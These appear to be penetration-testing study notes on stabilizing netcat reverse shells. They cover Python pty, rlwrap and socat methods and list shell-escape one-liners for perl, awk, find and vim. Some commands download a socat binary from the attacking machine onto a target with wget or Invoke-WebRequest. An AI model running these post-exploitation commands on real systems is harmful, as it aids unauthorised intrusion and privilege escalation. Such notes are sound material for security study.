Netcat Shell Stabilization

• Netcat shells are non-interactive and often have strange formatting errors

Technique 1: Python

• Only applicable only to Linux boxes

• Three stage process:

  1. Use python -c 'import pty;pty.spawn("/bin/bash")', which uses Python to spawn a better bash shell

  2. Then use export TERM=xterm -- this will give us access to term commands such as clear

  3. Background the shell using Ctrl + Z, back in our own terminal we use stty raw -echo; fg. This does two things:

     1. Turns off our own terminal echo (gives us access to tab autocompletes, arrow keys, and Ctrl + C to kill processes)

     2. Foregrounds the shell, completing the process

Technique 2: rlwrap

• rlwrap is a program which gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell

• Not installed by default on Kali so install it with sudo apt install rlwrap

• To use rlwrap , invoke a slightly different listener: rlwrap nc -lvnp <port>

• Prepending the netcat listener with rlwrap gives us a much more fully featured shell

• When dealing with a Linux target

  • Use the same trick as in step three of the previous technique

    • background the shell with Ctrl + Z, then use stty raw -echo; fg to stabilize and re-enter the shell

Technique 3: Socat

• This technique is limited to Linux targets

• First transfer a socat static compiled binary (a version of the program compiled to have no dependencies) up to the target machine

  • You can use a webserver on the attacking machine inside the directory containing your socat binary (sudo python3 -m http.server 80)

  • Then on the target machine, use the netcat shell to download the file with curl or wget (wget <LOCAL-IP>/socat -O /tmp/socat)

• In a Windows environment the same can be done with Powershell, using the Invoke-WebRequest or a webrequest system class (Invoke-WebRequest -uri <LOCAL-IP>/socat.exe -outfile C:\\Windows\temp\socat.exe)

• With all of the above techniques change your terminal tty size using stty -a

Other Interactive Shells

# This command executes the shell interpreter specified in the path in interactive mode
/bin/sh -i

# Perl to Shell
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";

# Ruby to shell
ruby: exec "/bin/sh"

# Lua to Shell
lua: os.execute('/bin/sh')

# AWK to Shell
awk 'BEGIN {system("/bin/sh")}'

# Find for a Shell
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

# Exec to Shell
find . -exec /bin/sh \; -quit

# VIM to Shell
vim -c ':!/bin/sh'

# Vim escape
vim
:set shell=/bin/sh
:shell

Execution Permission Considerations

// Run this command to list the file properties and permissions the account has over any given file or binary
ls -la <path/to/fileorbinary>

// Check what sudo permissions the account has. This needs a stable interactive shell to run
sudo -l